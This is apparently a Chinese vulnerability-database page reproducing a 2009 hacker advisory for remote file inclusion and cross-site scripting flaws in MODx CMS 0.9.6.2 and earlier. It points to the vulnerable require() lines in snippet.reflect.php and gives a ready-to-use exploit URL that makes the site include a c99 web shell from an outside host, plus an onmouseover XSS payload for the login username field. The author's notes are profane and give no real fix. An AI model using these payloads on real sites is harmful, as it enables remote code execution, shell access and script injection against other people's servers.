MODx CMS <= 0.9.6.2 (RFI/XSS) Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052250 漏洞类型
发布时间 2009-01-23 更新时间 2009-01-23
CVE编号 CVE-2008-5938
CVE-2008-5939
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009010190
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
########################################################################
#
#                               ::  The Codes Like A Game Anyone Can Play With It,s ::
#
# Title: MODx CMS  <= 0.9.6.2  Multiple Remote Vulne ( RFI + XSS)
#
# Vendor: http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.6.2.tar.gz&utm_source=0961p2&utm_medium=web&utm_campaign=download
#
# Discover by : RoMaNcYxHaCkEr (Br0k3n H34rT)
#
# My Email : rxh0@hotmail.com  [ Please Before Added Me , Be Sure I Don,t Give You Anythings :) ]
#
# Impact: High
#
# Fix: Contact With Me ;)
#
# Site: WwW.Sec-Code.CoM
#
# My Group : Security - Codes TeaM
#
########################################################################

####################
- Vulne  [RFI] In File snippet.reflect.php In Path assets/snippets/reflect/:
####################


require($reflect_base."configs/default.config.php");

require($reflect_base."default.templates.php");


####################
- Exploit  [RFI]:
####################

http://WwW.Sec-Code.CoM/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt?


####################
- Exploit  [XSS] In File index.php In Main Path:
####################

http://WwW.Sec-Code.CoM/modx-0.9.6.2/index.php?id=1

By POST Method Posted That,s In username Box (Variable)

"+onmouseover=alert(400942638703)+

####################
- Solution:
####################

Declear & Filter All This Fucking Functions

####################
- GreTzZ :
####################

No oN3 D3s3rved Just Fuck The Lamers , Kidz Or Snitch ( I Hate Him , And Do You ...!!! )

####################